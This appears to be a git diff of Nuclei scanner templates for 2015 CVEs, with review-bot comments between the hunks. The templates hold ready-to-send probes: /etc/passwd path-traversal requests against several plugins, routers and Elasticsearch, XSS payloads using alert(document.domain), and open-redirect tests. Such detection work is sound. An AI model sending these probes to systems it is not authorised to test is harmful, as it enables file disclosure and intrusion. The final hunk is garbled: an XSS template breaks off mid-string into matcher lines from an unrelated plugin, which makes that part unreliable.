a/nuclei-templates/CVE-2015/CVE-2015-4062.yaml b/nuclei-templates/CVE-2015/CVE-2015-4062.yaml index 7166bbffa9..a3086ce3cd 100644 
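Review bot: The new `cpe` and `product` pin the template to `tl-wr841n_\(9.0\)_firmware`, while the description lists thirteen affected models (Archer C5/C7/C8/C9, TL-WDR3500/3600/4300, TL-WR740N/741ND, TL-WR841N/841ND), so any tooling that filters on CPE will under-report the other models; a vendor-level CPE, or a comment stating that the cpe names only one of the affected products, would be more honest. The new tag list also carries both `tplink` and `tp-link` for the same vendor; pick one. The CVE-2015-7245 hunk has the same pattern (`dlink` and `d-link` both present, cpe pinned to `w1000cn-00` while the description also covers W1000CN-03 and W2000EN-00).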
--- a/nuclei-templates/CVE-2015/CVE-2015-4062.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-4062.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress NewStatPress 0.9.8 plugin contains a SQL injection vulnerability in includes/nsp_search.php. A remote authenticated user can execute arbitrary SQL commands via the where1 parameter in the nsp_search page to wp-admin/admin.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Update to plugin version 0.9.9 or latest. reference: @@ -19,8 +21,8 @@ info: cvss-score: 6.5 cve-id: CVE-2015-4062 cwe-id: CWE-89 - epss-score: 0.03004 - epss-percentile: 0.89849 + epss-score: 0.03919 + epss-percentile: 0.91099 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -28,7 +30,7 @@ info: vendor: newstatpress_project product: newstatpress framework: wordpress - tags: authenticated,cve,sqli,wp-plugin,newstatpress,packetstorm,cve2015,wordpress,wp + tags: cve2015,cve,authenticated,sqli,wp-plugin,newstatpress,packetstorm,wordpress,wp,newstatpress_project http: - raw: @@ -49,4 +51,4 @@ http: - 'status_code == 200' - 'contains(body_2, "newstatpress_page_nsp_search")' condition: and -# digest: 4a0a0047304502204dec7c6c36d81070bec045911fab0715a98300ec24459f91434c8b1c77f77349022100ca4ea6580d1c1df64c55ee768d66c6d24eda20f19dc1c2bd5b33fed5c5e5f7cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cb6d01be28991515ac71dda8242c7249446951e8cb1a66461263462841119495022100ef9dc6f15e3e424c0eaa861f7e49c07486bda3c3ce0c48b8dc6ff5ffe611a6f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-4063.yaml b/nuclei-templates/CVE-2015/CVE-2015-4063.yaml index ffdd1def42..f569a4a3d6 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-4063.yaml 
+++ b/nuclei-templates/CVE-2015/CVE-2015-4063.yaml @@ -6,6 +6,8 @@ info: severity: low description: | WordPress NewStatPress plugin before 0.9.9 contains a cross-site scripting vulnerability in includes/nsp_search.php. The plugin allows remote authenticated users to inject arbitrary web script or HTML via the where1 parameter in the nsp_search page to wp-admin/admin.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: Update to plugin version 0.9.9 or latest. reference: - https://packetstormsecurity.com/files/132038/ @@ -19,7 +21,7 @@ info: cve-id: CVE-2015-4063 cwe-id: CWE-79 epss-score: 0.04016 - epss-percentile: 0.91113 + epss-percentile: 0.91867 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,7 +29,7 @@ info: vendor: newstatpress_project product: newstatpress framework: wordpress - tags: cve,cve2015,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm + tags: cve2015,cve,xss,wordpress,wp-plugin,wp,newstatpress,packetstorm,newstatpress_project http: - raw: @@ -47,4 +49,4 @@ http: - 'status_code_2 == 200' - "contains(body_2, '') && contains(body_2, 'newstatpress')" condition: and -# digest: 4a0a00473045022100b1988c578ecd4869b88b860376e662c088ebb46fc387acdfa249d4384ca7aac40220055002cbdbc794c61cb5168cc2f1237d4eeb7ec4391e43cf97069cb0883b761d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b0f2e30065dca077f71d175c0be5c923af94f47acfb9c5706268811d87855d9d0220589926117e2ba9dd25f96017a9e5ad2b082115c853eddbc7805ddf2ae30ab9b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-4074.yaml b/nuclei-templates/CVE-2015/CVE-2015-4074.yaml index 01735983ba..7b9c50d4cb 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-4074.yaml 
+++ b/nuclei-templates/CVE-2015/CVE-2015-4074.yaml @@ -5,26 +5,38 @@ info: author: 0x_Akoko severity: high description: Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server. + remediation: | + Upgrade to Joomla! Helpdesk Pro plugin version 1.4.0 or later to fix the local file inclusion vulnerability. reference: - https://packetstormsecurity.com/files/132766/Joomla-Helpdesk-Pro-XSS-File-Disclosure-SQL-Injection.html - https://www.exploit-db.com/exploits/37666/ - - https://www.cvedetails.com/cve/CVE-2015-4074 + - https://nvd.nist.gov/vuln/detail/CVE-2015-4074 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4074 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-4074 cwe-id: CWE-22 - tags: lfi,packetstorm,edb,cve,cve2015,joomla,plugin + epss-score: 0.00598 + epss-percentile: 0.77961 + cpe: cpe:2.3:a:helpdesk_pro_project:helpdesk_pro:*:*:*:*:*:joomla\!:*:* + metadata: + max-request: 1 + vendor: helpdesk_pro_project + product: helpdesk_pro + framework: joomla\! + tags: cve2015,cve,lfi,packetstorm,edb,joomla,plugin,helpdesk_pro_project,joomla\!,xss -requests: +http: - method: GET path: - "{{BaseURL}}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe" matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" 
@@ -32,5 +44,4 @@ requests: - type: status status: - 200 - -# Enhanced by cs on 2022/09/08 +# digest: 4a0a0047304502202842932433472fb23fa32b0fb531bf216b2816d459a655b2302110a3b5e191d9022100bcc4cc9601e498334a410e1ff13dfec9aa1aca4ebca8ad7b044b4709e3ec4860:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-4127.yaml b/nuclei-templates/CVE-2015/CVE-2015-4127.yaml index 5d59f8802d..d418678913 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-4127.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-4127.yaml 
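Review bot: The new tag list adds `xss` to a template whose only probe is the path-traversal request for `/etc/passwd` (`cwe-id: CWE-22`), so a scan filtered on `xss` would run a file-disclosure check and a finding from this template would carry a tag for a weakness it does not test; drop `xss` here. `framework: joomla\!` and the tag `joomla\!` carry the CPE escaping of the vendor string into fields that are matched literally, and in a plain YAML scalar the backslash is kept as a character — the sibling WordPress templates use `framework: wordpress`, so `framework: joomla` and the existing `joomla` tag are the consistent form. The first hunk of this file starts at the `author` line, so the `name` field is outside the visible diff and cannot be checked for the same wording.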
@@ -6,16 +6,44 @@ info: severity: medium description: | WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. + remediation: | + Update to the latest version of the WordPress Church Admin plugin (0.810 or higher) to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/37112 - https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408 - https://wordpress.org/plugins/church-admin/changelog/ - https://nvd.nist.gov/vuln/detail/CVE-2015-4127 classification: + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2015-4127 - tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss + cwe-id: CWE-79 + epss-score: 0.0034 + epss-percentile: 0.68397 + cpe: cpe:2.3:a:church_admin_project:church_admin:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: church_admin_project + product: church_admin + framework: wordpress + tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Church Admin =' -requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -35,5 +63,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/08/31 +# digest: 4b0a00483046022100c5529d0f19b2c265d2588980579e3d4b1321312560cec46437ddd2fab8714242022100b4612385d3dbaaad79be28b6f61cd619e9c90dd9b05c6b83e718bd7dbece46b4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
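Review bot: The new `flow: http(1) && http(2)` gate only checks that `readme.txt` contains `Church Admin =`, which confirms the plugin is installed but not that it is below the fixed version 0.810 named in the description, so patched sites still receive the second request and the gate saves nothing on them. If the readme's `Stable tag:` line is available, extracting the version there and comparing it in the flow would let the template skip patched installs and reduce noise in results. The second request keeps the context-line path `includes/validate.php?id=`, whereas the description names the `address` parameter of the registration form; these may be two sinks of the same CVE, but the description should mention the endpoint actually exercised. The request that follows the removed `-requests:` line is now nested under `http:`, and the collapsed diff hides its indentation, so please confirm it parses as the second list item.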
diff --git a/nuclei-templates/CVE-2015/cve-2015-4414.yaml b/nuclei-templates/CVE-2015/CVE-2015-4414.yaml
similarity index 100%
rename from nuclei-templates/CVE-2015/cve-2015-4414.yaml
rename to nuclei-templates/CVE-2015/CVE-2015-4414.yaml
diff --git a/nuclei-templates/CVE-2015/CVE-2015-4666.yaml b/nuclei-templates/CVE-2015/CVE-2015-4666.yaml
new file mode 100644
index 0000000000..0b7f8ae662
--- /dev/null
+++ b/nuclei-templates/CVE-2015/CVE-2015-4666.yaml
@@ -0,0 +1,29 @@
+id: CVE-2015-4666
+info:
+ name: Xceedium Xsuite 2.4.4.5 - Directory Traversal
+ author: 0x_Akoko
+ severity: high
+ description: Directory traversal vulnerability in opm/read_sessionlog.php in Xceedium Xsuite 2.4.4.5 and earlier allows remote attackers to read arbitrary files in the logFile parameter.
+ reference:
+ - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt
+ - https://www.cvedetails.com/cve/CVE-2015-4666
+ - http://packetstormsecurity.com/files/132809/Xceedium-Xsuite-Command-Injection-XSS-Traversal-Escalation.html
+ - http://www.modzero.ch/advisories/MZ-15-02-Xceedium-Xsuite.txt
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2015-4666
+ cwe-id: CWE-22
+ tags: cve,cve2015,xceedium,xsuite,lfi
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/opm/read_sessionlog.php?logFile=....//....//....//....//etc/passwd"
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2015/CVE-2015-4668.yaml b/nuclei-templates/CVE-2015/CVE-2015-4668.yaml
deleted file mode 100644
index 071a213f24..0000000000
--- a/nuclei-templates/CVE-2015/CVE-2015-4668.yaml
+++ /dev/null
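Review bot: The new file uses the `requests:` section key and has no `metadata` block, `max-request`, `epss-score`, `cpe` or trailing `# digest:` line, whereas the rest of this commit migrates existing templates from `requests:` to `http:` and adds exactly those fields, so the new template lands in the old schema on the same commit that retires it. Suggest writing it in the same shape as the other `http:` templates here, with `metadata:` carrying `max-request: 1`, `vendor: xceedium` and `product: xsuite`. The reference list also links cvedetails instead of the NVD entry the sibling templates use; `https://nvd.nist.gov/vuln/detail/CVE-2015-4666` is the conventional link.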
@@ -1,30 +0,0 @@
-id: CVE-2015-4668
-
-info:
- name: Xsuite 2.4.4.5 - Open Redirect
- author: 0x_Akoko
- severity: medium
- description: |
- Open redirect vulnerability in Xsuite 2.4.4.5 and earlier allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirurl parameter.
- reference:
- - https://www.modzero.com/advisories/MZ-15-02-Xceedium-Xsuite.txt
- - https://www.cvedetails.com/cve/CVE-2015-4668
- - https://vuldb.com/?id.107082
- - https://www.exploit-db.com/exploits/37708/
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.1
- cve-id: CVE-2015-4668
- cwe-id: CWE-601
- tags: cve,cve2015,redirect,xsuite,xceedium
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/openwin.php?redirurl=http://interact.sh'
-
- matchers:
- - type: regex
- part: header
- regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
diff --git a/nuclei-templates/CVE-2015/CVE-2015-4694.yaml b/nuclei-templates/CVE-2015/CVE-2015-4694.yaml
index ad2ea75727..97b8256f1d 100644
--- a/nuclei-templates/CVE-2015/CVE-2015-4694.yaml
+++ b/nuclei-templates/CVE-2015/CVE-2015-4694.yaml
@@ -1,31 +1,30 @@ id: CVE-2015-4694 + info: - name: WordPress Zip Attachments <= 1.1.4 - Arbitrary File Retrieval + name: Zip Attachments <= 1.1.4 - Arbitrary File Download author: 0x_Akoko severity: high - description: WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file. - reference: - - https://wordpress.org/plugins/zip-attachments/#developers - - https://wpscan.com/vulnerability/8047 - - https://nvd.nist.gov/vuln/detail/CVE-2015-4694 - - http://www.vapid.dhs.org/advisory.php?v=126 + description: The zip-attachments plugin allows arbitrary file downloads because it does not check the download path of the requested file. + reference: https://wpscan.com/vulnerability/8047 + tags: lfi,wordpress,cve,cve2015,wp-plugin classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-score: 8.60 cve-id: CVE-2015-4694 cwe-id: CWE-22 - tags: lfi,wordpress,cve,cve2015,wp-plugin + requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/zip-attachments/download.php?za_file=../../../../../etc/passwd&za_filename=passwd' + matchers-condition: and matchers: + - type: regex regex: - "root:[x*]:0:0" + - type: status status: - 200 - -# Enhanced by mp on 2022/04/12 diff --git a/nuclei-templates/CVE-2015/CVE-2015-5354.yaml b/nuclei-templates/CVE-2015/CVE-2015-5354.yaml deleted file mode 100644 index 5af1fedb8f..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-5354.yaml +++ /dev/null 
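Review bot: On the new side the reference list shrinks from four entries (including the NVD record and the vendor advisory) to a single bare `reference: https://wpscan.com/vulnerability/8047`, `cvss-score` becomes `8.60` while every other template in this commit uses the plain number, `tags` moves out of the classification block, and the section stays on `requests:` while siblings migrate to `http:`. Taken together this looks like a reversion to an older revision of the template rather than an update; the CVE-2015-9414 hunk has the same shape (`6.1` to `6.10`, references dropped, `description` moved to the end and quoted). Suggest keeping the previous reference list and `cvss-score: 8.6`, and migrating to `http:` with a `metadata` block as the other updated files do.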
@@ -1,31 +0,0 @@ -id: CVE-2015-5354 - -info: - name: Novius OS 5.0.1-elche - Open Redirect - author: 0x_Akoko - severity: medium - description: Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login. - reference: - - https://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html - - https://vuldb.com/?id.76181 - - http://packetstormsecurity.com/files/132478/Novius-OS-5.0.1-elche-XSS-LFI-Open-Redirect.html - - https://nvd.nist.gov/vul n/detail/CVE-2015-5354 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2015-5354 - cwe-id: CWE-601 - tags: cve,cve2015,redirect,novius - -requests: - - method: GET - path: - - '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh' - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by mp on 2022/07/22 diff --git a/nuclei-templates/CVE-2015/CVE-2015-5469.yaml b/nuclei-templates/CVE-2015/CVE-2015-5469.yaml index c9df9cc28c..7fd1a2a4de 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-5469.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-5469.yaml 
@@ -5,26 +5,38 @@ info: author: 0x_Akoko severity: high description: WordPress MDC YouTube Downloader 2.1.0 plugin is susceptible to local file inclusion. A remote attacker can read arbitrary files via a full pathname in the file parameter to includes/download.php. + impact: | + The vulnerability can lead to unauthorized access to sensitive files, execution of arbitrary code, and potential compromise of the entire WordPress installation. + remediation: | + Update to the latest version of WordPress MDC YouTube Downloader plugin or apply the patch provided by the vendor. reference: - https://www.openwall.com/lists/oss-security/2015/07/10/5 - http://www.vapid.dhs.org/advisory.php?v=133 - http://www.openwall.com/lists/oss-security/2015/07/10/5 - https://nvd.nist.gov/vuln/detail/CVE-2015-5469 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-5469 cwe-id: CWE-22 - tags: cve,cve2015,wp,lfi + epss-score: 0.02176 + epss-percentile: 0.88248 + cpe: cpe:2.3:a:mdc_youtube_downloader_project:mdc_youtube_downloader:2.1.0:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: mdc_youtube_downloader_project + product: mdc_youtube_downloader + framework: wordpress + tags: cve2015,cve,wp,lfi,mdc_youtube_downloader_project,wordpress -requests: +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/mdc-youtube-downloader/includes/download.php?file=/etc/passwd" matchers-condition: and matchers: - - type: regex regex: - "root:[x*]:0:0" @@ -32,5 +44,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/09/30 +# digest: 4a0a00473045022100ff5f92a49920cd8381ad88a3856050db835c74ab7946be53e0a1a413f0b190290220332d02cd0e4a2dd43ebccfbf82bba432e28fe572daf36a85f1ef7e36420aa6c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
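Review bot: The added `impact` claims "execution of arbitrary code", but the description and `cwe-id: CWE-22` describe a local file read through the `file` parameter of includes/download.php, and nothing in the template or its references supports code execution, so the impact overstates severity for anyone triaging on it. `impact: | An unauthenticated attacker can read arbitrary files that the web server process can access, such as configuration files containing credentials.` stays within what the description supports. The new `remediation` ("latest version or vendor patch") is also vague; if a fixed version is known it should be stated, otherwise say that no fixed version is recorded.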
diff --git a/nuclei-templates/CVE-2015/CVE-2015-5531.yaml b/nuclei-templates/CVE-2015/CVE-2015-5531.yaml index a67fffd436..de74ca8495 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-5531.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-5531.yaml @@ -7,11 +7,8 @@ info: reference: - https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2015-5531 - https://nvd.nist.gov/vuln/detail/CVE-2015-5531 - - http://packetstormsecurity.com/files/132721/Elasticsearch-Directory-Traversal.html - - https://www.elastic.co/community/security/ - classification: - cve-id: CVE-2015-5531 tags: cve,cve2015,elasticsearch + requests: - raw: - | @@ -24,6 +21,7 @@ requests: "location": "/usr/share/elasticsearch/repo/test" } } + - | PUT /_snapshot/test2 HTTP/1.1 Host: {{Hostname}} @@ -34,9 +32,11 @@ requests: "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" } } + - | GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 Host: {{Hostname}} + matchers-condition: and matchers: - type: word @@ -46,6 +46,7 @@ requests: - 'Failed to derive xcontent from' - '114, 111, 111, 116, 58' condition: and + - type: status status: - 400 diff --git a/nuclei-templates/CVE-2015/cve-2015-5688.yaml b/nuclei-templates/CVE-2015/CVE-2015-5688.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-5688.yaml rename to nuclei-templates/CVE-2015/CVE-2015-5688.yaml diff --git a/nuclei-templates/CVE-2015/cve-2015-6477.yaml b/nuclei-templates/CVE-2015/CVE-2015-6477.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-6477.yaml rename to nuclei-templates/CVE-2015/CVE-2015-6477.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-6544.yaml b/nuclei-templates/CVE-2015/CVE-2015-6544.yaml deleted file mode 100644 index defac45d15..0000000000 --- a/nuclei-templates/CVE-2015/CVE-2015-6544.yaml +++ /dev/null 
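Review bot: The first hunk removes the whole `classification:` block, including `cve-id: CVE-2015-5531`, together with the packetstorm and elastic.co references, and leaves the section on `requests:` while the rest of the commit migrates to `http:` and adds classification data; for a template that still carries the CVE in its filename and `id`, losing `cve-id` breaks any consumer that filters on it. This again looks like a reversion to an earlier revision rather than an update. Suggest restoring `classification:` with `cve-id: CVE-2015-5531` (plus CWE and CVSS fields if available) and the two dropped references.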
@@ -1,35 +0,0 @@ -id: CVE-2015-6544 -info: - name: iTop XSS - author: pikpikcu - severity: medium - description: | - Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2015-6544 - - https://www.htbridge.com/advisory/HTB23268 - - http://sourceforge.net/p/itop/tickets/1114/ - - http://sourceforge.net/p/itop/code/3662/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2015-6544 - cwe-id: CWE-79 - tags: cve,cve2015,xss,itop -requests: - - method: GET - path: - - "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - '' - part: body - - type: status - status: - - 200 - - type: word - part: header - words: - - text/html diff --git a/nuclei-templates/CVE-2015/CVE-2015-7245.yaml b/nuclei-templates/CVE-2015/CVE-2015-7245.yaml index d952de8e1f..4bb280a998 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-7245.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-7245.yaml 
@@ -6,18 +6,31 @@ info: severity: high description: | D-Link DVG-N5402SP is susceptible to local file inclusion in products with firmware W1000CN-00, W1000CN-03, or W2000EN-00. A remote attacker can read sensitive information via a .. (dot dot) in the errorpage parameter. + impact: | + An attacker can read sensitive files on the system, potentially leading to unauthorized access or disclosure of sensitive information. + remediation: | + Update the router firmware to the latest version, which includes a fix for the local file inclusion vulnerability. reference: - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html - https://www.exploit-db.com/exploits/39409/ - https://nvd.nist.gov/vuln/detail/CVE-2015-7245 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2015-7245 cwe-id: CWE-22 - tags: cve,cve2015,dlink,lfi,packetstorm,edb + epss-score: 0.96881 + epss-percentile: 0.99685 + cpe: cpe:2.3:o:d-link:dvg-n5402sp_firmware:w1000cn-00:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: d-link + product: dvg-n5402sp_firmware + tags: cve2015,cve,dlink,lfi,packetstorm,edb,d-link -requests: +http: - raw: - | POST /cgibin/webproc HTTP/1.1 @@ -30,5 +43,4 @@ requests: part: body regex: - "root:.*:0:0:" - -# Enhanced by mp on 2022/09/30 +# digest: 4a0a00473045022100d1aafb8c10f1a664ef200cb0b07719e65cca20f646b773edd9631bbd351283b102206cf94666854313f20d7360c569b2d3fa912b5887a16ae63b1dcf827a26d04341:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/cve-2015-7377.yaml b/nuclei-templates/CVE-2015/CVE-2015-7377.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-7377.yaml rename to nuclei-templates/CVE-2015/CVE-2015-7377.yaml 
diff --git a/nuclei-templates/CVE-2015/cve-2015-7823.yaml b/nuclei-templates/CVE-2015/CVE-2015-7823.yaml similarity index 100% rename from nuclei-templates/CVE-2015/cve-2015-7823.yaml rename to nuclei-templates/CVE-2015/CVE-2015-7823.yaml diff --git a/nuclei-templates/CVE-2015/CVE-2015-9312.yaml b/nuclei-templates/CVE-2015/CVE-2015-9312.yaml index 6ecf35121f..72bff270c2 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-9312.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-9312.yaml @@ -6,19 +6,22 @@ info: severity: medium description: | WordPress NewStatPress plugin through 1.0.4 contains a cross-site scripting vulnerability. The plugin utilizes, on lines 28 and 31 of the file "includes/nsp_search.php", several variables from the $_GET scope without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to initiate a cross-site scripting attack. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 1.0.6 reference: - https://wpscan.com/vulnerability/46bf6c69-b612-4aee-965d-91f53f642054 - https://g0blin.co.uk/g0blin-00057/ - https://wordpress.org/plugins/newstatpress/#developers - https://nvd.nist.gov/vuln/detail/CVE-2015-9312 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2015-9312 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36961 + epss-percentile: 0.36245 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -26,7 +29,7 @@ info: vendor: newstatpress_project product: newstatpress framework: wordpress - tags: cve2015,xss,authenticated,wp,newstatpress,wpscan,cve,wordpress,wp-plugin + tags: cve2015,cve,xss,authenticated,wp,newstatpress,wpscan,wordpress,wp-plugin,newstatpress_project http: - raw: @@ -47,4 +50,4 @@ http: - 'contains(body_2, "=5' + - 'duration>=7' - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "404-to-301")' condition: and -# digest: 4b0a00483046022100fe561eccf1babd7e46993dd38ffd9baed12d2115f59c4efc2ac192f76648d5c2022100a708bffdc7f0d5fbe3a73070ae2bcff2171ab0b6c5b85263aa5def6507b0da90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220323384f1c4a276c3079649349540d04cea85e2fe8ce4c73d852567ac9fc5ba7b02203375e2c826ab3ce90ed5672b210ae86d810e572690d581ff587260ceceebb4f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2015/CVE-2015-9414.yaml b/nuclei-templates/CVE-2015/CVE-2015-9414.yaml index 176243919d..d65a7b2262 100644 --- a/nuclei-templates/CVE-2015/CVE-2015-9414.yaml +++ b/nuclei-templates/CVE-2015/CVE-2015-9414.yaml 
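Review bot: The matcher lines under `@@ -47,4 +50,4 @@` do not look like they belong to this NewStatPress reflected-XSS template: the new side adds `- 'duration>=7'`, a response-time condition used by time-based injection checks, and the surrounding DSL references `404-to-301`, which is a different plugin. The hunk also shows far more lines than the 4/4 its header declares, so this may be an artifact of how the diff was rendered rather than what was committed; it is worth opening the file to confirm the DSL block holds only the `status_code`, `content_type` and reflected-marker conditions an XSS check needs. If a `duration` condition really is present in an `and`-joined matcher, the template will miss every response that comes back quickly, which for a reflected XSS is all of them.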
